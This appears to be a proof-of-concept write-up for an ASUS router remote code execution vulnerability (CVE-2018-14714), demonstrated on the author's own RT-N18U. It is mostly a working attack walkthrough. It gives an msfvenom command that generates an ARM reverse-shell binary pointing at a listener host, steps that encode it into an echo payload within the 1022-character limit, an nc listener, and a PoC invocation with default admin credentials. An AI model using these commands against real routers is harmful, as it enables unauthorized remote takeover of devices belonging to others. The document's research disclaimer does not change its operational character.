ASUS wifi router RCE vulnerability
This PoC is for learning and research purposes only. Do not use it for illegal activities; you are solely responsible for any legal consequences.
- This is a test conducted after code modifications based on this PoC, as the original PoC might have failed due to lacking root permissions.
In the demonstration below, the tested device model is an ASUS RT-N18U, a router I purchased during my university years. It is now my test machine :)
You can use msfvenom command to generate a lightweight reverse shell binary executable. You can modify the parameters according to the kernel environment you are working with. In my case, it's armv7l, and the command is as follows:
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o pwn.elf
Convert the generated binary file into binary data.
$ for i in `cat pwn.elf | xxd -p`;do echo -n $i;done
$ python3 -c 'a=input("binary data:");print("echo -ne \"",end="");print(*[f"\\x{a[i:i+2]}" for i in range(0,len(a),2)],sep="",end="");print("\"")'
To confirm the existence of a vulnerability on the target, rerun the Python script with the added shell parameters to enter an interactive pseudo-shell. Please note that it is normal if commands do not produce any output, as there is no place to receive stdout. However, using the sleep command can help you verify that the commands have indeed been executed.
Additionally, it is important to note that, based on testing, the command line allows a maximum of 1022 characters. You need to construct commands that are less than 1022 characters in length. Therefore, you will need to manually split the payload and execute it in parts to ensure our command runs successfully.
-
Next, let's obtain a real reverse shell. You can start by listening on the specified port.
$ nc -lvnp 4444 -
Execute the Python PoC script to obtain a pseudo-shell for injecting the payload.
$ python3 CVE-2018-14714-RCE_PoC.py admin admin shell
-
Finally, all that's left is to enjoy your acquired reverse shell :)
